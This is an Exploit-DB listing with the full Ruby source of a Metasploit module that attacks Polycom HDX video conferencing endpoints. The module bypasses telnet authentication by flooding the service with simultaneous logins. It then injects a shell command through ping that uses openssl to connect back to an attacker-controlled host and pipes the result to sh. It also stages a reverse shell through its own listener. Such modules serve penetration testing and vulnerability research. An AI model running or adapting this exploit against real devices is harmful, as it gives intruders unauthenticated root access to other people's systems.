Polycom - Command Shell Authorization Bypass (Metasploit)

EDB-ID:

43032

CVE:

N/A




Platform:

Unix

Date:

2017-10-23


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'            => 'Polycom Command Shell Authorization Bypass',
        'Alias'           => 'polycom_hdx_auth_bypass',
        'Author'          =>
          [
            'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # module
            'h00die <mike@shorebreaksecurity.com>',         # submission/cleanup
          ],
        'DisclosureDate'  => 'Jan 18 2013',
        'Description'     => %q(
          The login component of the Polycom Command Shell on Polycom HDX
          video endpoints, running software versions 3.0.5 and earlier,
          is vulnerable to an authorization bypass when simultaneous
          connections are made to the service, allowing remote network
          attackers to gain access to a sandboxed telnet prompt without
          authentication. Versions prior to 3.0.4 contain OS command
          injection in the ping command which can be used to execute
          arbitrary commands as root.
          ),
        'License'         => MSF_LICENSE,
        'References'      =>
          [
            [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf' ],
            [ 'URL', 'http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html' ],
            [ 'EDB', '24494']
          ],
        'Platform'    => 'unix',
        'Arch'        => ARCH_CMD,
        'Privileged'  => true,
        'Targets'     => [ [ "Universal", {} ] ],
        'Payload'     =>
        {
          'Space'        => 8000,
          'DisableNops'  => true,
          'Compat'       => { 'PayloadType' => 'cmd' }
        },
        'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' },
        'DefaultTarget'  => 0
      )
    )

    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(23),
        OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]),
        OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ])
      ], self.class
    )
    register_advanced_options(
      [
        OptInt.new('THREADS', [false, 'Threads for authentication bypass', 6]),
        OptInt.new('MAX_CONNECTIONS', [false, 'Threads for authentication bypass', 100])
      ], self.class
    )
  end

  def check
    connect
    sock.put(Rex::Text.rand_text_alpha(rand(5) + 1) + "\n")
    Rex.sleep(1)
    res = sock.get_once
    disconnect

    if !res && !res.empty?
      return Exploit::CheckCode::Safe
    end

    if res =~ /Welcome to ViewStation/
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    # Keep track of results (successful connections)
    results = []

    # Random string for password
    password = Rex::Text.rand_text_alpha(rand(5) + 1)

    # Threaded login checker
    max_threads = datastore['THREADS']
    cur_threads = []

    # Try up to 100 times just to be sure
    queue = [*(1..datastore['MAX_CONNECTIONS'])]

    print_status("Starting Authentication bypass with #{datastore['THREADS']} threads with #{datastore['MAX_CONNECTIONS']} max connections ")
    until queue.empty?
      while cur_threads.length < max_threads

        # We can stop if we get a valid login
        break unless results.empty?

        # keep track of how many attempts we've made
        item = queue.shift

        # We can stop if we reach max tries
        break unless item

        t = Thread.new(item) do |count|
          sock = connect
          sock.put(password + "\n")
          res = sock.get_once

          until res.empty?
            break unless results.empty?

            # Post-login Polycom banner means success
            if res =~ /Polycom/
              results << sock
              break
            # bind error indicates bypass is working
            elsif res =~ /bind/
              sock.put(password + "\n")
            # Login error means we need to disconnect
            elsif res =~ /failed/
              break
            # To many connections means we need to disconnect
            elsif res =~ /Error/
              break
            end
            res = sock.get_once
          end
        end

        cur_threads << t
      end

      # We can stop if we get a valid login
      break unless results.empty?

      # Add to a list of dead threads if we're finished
      cur_threads.each_index do |ti|
        t = cur_threads[ti]
        unless t.alive?
          cur_threads[ti] = nil
        end
      end

      # Remove any dead threads from the set
      cur_threads.delete(nil)

      Rex.sleep(0.25)
    end

    # Clean up any remaining threads
    cur_threads.each { |sock| sock.kill }

    if !results.empty?
      print_good("#{rhost}:#{rport} Successfully exploited the authentication bypass flaw")
      do_payload(results[0])
    else
      print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable")
    end
  end

  def do_payload(sock)
    # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
    cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])

    # Start a listener
    start_listener(true)

    # Figure out the port we picked
    cbport = self.service.getsockname[2]

    # Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128
    cmd = "\nping ;s=$IFS;openssl${s}s_client$s-quiet$s-host${s}#{cbhost}$s-port${s}#{cbport}|sh;ping$s-c${s}1${s}0\n"
    sock.put(cmd)

    # Give time for our command to be queued and executed
    1.upto(5) do
      Rex.sleep(1)
      break if session_created?
    end
  end

  def stage_final_payload(cli)
    print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
    cli.put(payload.encoded + "\n")
  end

  def start_listener(ssl = false)
    comm = datastore['ListenerComm']
    if comm == 'local'
      comm = ::Rex::Socket::Comm::Local
    else
      comm = nil
    end

    self.service = Rex::Socket::TcpServer.create(
      'LocalPort' => datastore['CBPORT'],
      'SSL'       => ssl,
      'SSLCert'   => datastore['SSLCert'],
      'Comm'      => comm,
      'Context'   =>
      {
        'Msf'        => framework,
        'MsfExploit' => self
      }
    )

    self.service.on_client_connect_proc = proc { |client|
      stage_final_payload(client)
    }

    # Start the listening service
    self.service.start
  end

  # Shut down any running services
  def cleanup
    super
    if self.service
      print_status("Shutting down payload stager listener...")
      begin
        self.service.deref if self.service.is_a?(Rex::Service)
        if self.service.is_a?(Rex::Socket)
          self.service.close
          self.service.stop
        end
        self.service = nil
      rescue ::Exception
      end
    end
  end

  # Accessor for our TCP payload stager
  attr_accessor :service
end